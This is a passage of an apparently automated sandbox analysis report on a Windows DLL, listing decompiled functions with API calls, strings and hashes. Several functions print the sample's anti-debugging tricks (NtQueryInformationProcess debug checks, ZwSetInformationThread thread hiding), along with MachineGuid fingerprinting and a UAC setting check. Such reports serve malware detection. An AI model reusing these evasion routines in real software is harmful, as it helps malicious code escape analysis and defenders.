                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                      • API String ID: 3138967372-3622423033
                                                                                                                                                      • Opcode ID: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                      • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                      • Opcode Fuzzy Hash: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                      • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D240, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001D240() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}








                                                                                                                                                      0x1001d246
                                                                                                                                                      0x1001d24d
                                                                                                                                                      0x1001d254
                                                                                                                                                      0x1001d25b
                                                                                                                                                      0x1001d262
                                                                                                                                                      0x1001d286
                                                                                                                                                      0x1001d2a7
                                                                                                                                                      0x1001d2b2
                                                                                                                                                      0x1001d2b2
                                                                                                                                                      0x1001d2b9
                                                                                                                                                      0x1001d2b9
                                                                                                                                                      0x1001d2c5

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                      • EnableLUA, xrefs: 1001D296
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                      • API String ID: 3677997916-2194944742
                                                                                                                                                      • Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
                                                                                                                                                      • Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A2F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A2F0(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;

				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					return _v12;
				}
				return 0;
			}





                                                                                                                                                      0x1001a2f6
                                                                                                                                                      0x1001a2fd
                                                                                                                                                      0x1001a321
                                                                                                                                                      0x1001a344
                                                                                                                                                      0x1001a34a
                                                                                                                                                      0x1001a34a
                                                                                                                                                      0x1001a355
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001a35b
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001A355
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                      • API String ID: 3677997916-880526231
                                                                                                                                                      • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                      • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10013389, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E10013389(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10332c6c);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10332c68);
					_t11 =  *(TlsGetValue( *0x10332c6c))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10332c68);
				 *((intOrPtr*)(E10013034( *0x10333820)))();
				_push(_t11);
				L10013256(_t9, _t11, _t15, _t16);
				_t5 =  *0x10332c6c; // 0x1d
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}








                                                                                                                                                      0x10013389
                                                                                                                                                      0x10013396
                                                                                                                                                      0x10013398
                                                                                                                                                      0x1001339a
                                                                                                                                                      0x1001339c
                                                                                                                                                      0x100133ac
                                                                                                                                                      0x100133ac
                                                                                                                                                      0x100133ae
                                                                                                                                                      0x100133af
                                                                                                                                                      0x100133b1
                                                                                                                                                      0x100133c3
                                                                                                                                                      0x100133c5
                                                                                                                                                      0x100133c6
                                                                                                                                                      0x100133cc
                                                                                                                                                      0x100133d4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100133d9
                                                                                                                                                      0x100133df

                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 10013396
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 100133A8
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 100133BD
                                                                                                                                                      • TlsSetValue.KERNEL32(0000001D,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240,0000000C,1000EBE7), ref: 100133D9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$__decode_pointer
                                                                                                                                                      • String ID: tj
                                                                                                                                                      • API String ID: 3389472636-3491506833
                                                                                                                                                      • Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
                                                                                                                                                      • Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
                                                                                                                                                      • Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019F00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019F00() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}






                                                                                                                                                      0x10019f06
                                                                                                                                                      0x10019f18
                                                                                                                                                      0x10019f2a
                                                                                                                                                      0x10019f3e
                                                                                                                                                      0x10019f4d

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 353374858-801751246
                                                                                                                                                      • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                      • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019F50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019F50() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                      0x10019f56
                                                                                                                                                      0x10019f68
                                                                                                                                                      0x10019f7a
                                                                                                                                                      0x10019f8e
                                                                                                                                                      0x10019f9d

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 353374858-801751246
                                                                                                                                                      • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                      • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                      • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                      • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019FA0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019FA0() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                      0x10019fa6
                                                                                                                                                      0x10019fb8
                                                                                                                                                      0x10019fca
                                                                                                                                                      0x10019fde
                                                                                                                                                      0x10019fed

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 353374858-801751246
                                                                                                                                                      • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                      • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                      • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                      • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019D40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderthreadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return _v8(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                      0x10019d51
                                                                                                                                                      0x10019d63
                                                                                                                                                      0x10019d79

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                      • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCurrentLibraryLoadProcThread
                                                                                                                                                      • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                      • API String ID: 903204110-1680533912
                                                                                                                                                      • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                      • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                      • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                      • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F4A0, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}











                                                                                                                                                      0x1001f4a6
                                                                                                                                                      0x1001f4ad
                                                                                                                                                      0x1001f4b4
                                                                                                                                                      0x1001f4d6
                                                                                                                                                      0x1001f500
                                                                                                                                                      0x1001f502
                                                                                                                                                      0x1001f508
                                                                                                                                                      0x1001f50e
                                                                                                                                                      0x1001f514
                                                                                                                                                      0x1001f51a
                                                                                                                                                      0x1001f520
                                                                                                                                                      0x1001f526
                                                                                                                                                      0x1001f534
                                                                                                                                                      0x1001f540
                                                                                                                                                      0x1001f543
                                                                                                                                                      0x1001f554
                                                                                                                                                      0x1001f557
                                                                                                                                                      0x1001f557
                                                                                                                                                      0x1001f55e
                                                                                                                                                      0x1001f55e
                                                                                                                                                      0x1001f56d

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3147484438-0
                                                                                                                                                      • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                      • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F3D0, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				if(PathFileExistsA(_a4) != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}












                                                                                                                                                      0x1001f3d6
                                                                                                                                                      0x1001f3dd
                                                                                                                                                      0x1001f3f0
                                                                                                                                                      0x1001f412
                                                                                                                                                      0x1001f419
                                                                                                                                                      0x1001f435
                                                                                                                                                      0x1001f43b
                                                                                                                                                      0x1001f441
                                                                                                                                                      0x1001f447
                                                                                                                                                      0x1001f44d
                                                                                                                                                      0x1001f453
                                                                                                                                                      0x1001f459
                                                                                                                                                      0x1001f467
                                                                                                                                                      0x1001f470
                                                                                                                                                      0x1001f476
                                                                                                                                                      0x1001f487
                                                                                                                                                      0x1001f48a
                                                                                                                                                      0x1001f48a
                                                                                                                                                      0x1001f419
                                                                                                                                                      0x1001f496

                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 1001F3E8
                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                      • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3038978132-0
                                                                                                                                                      • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                      • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
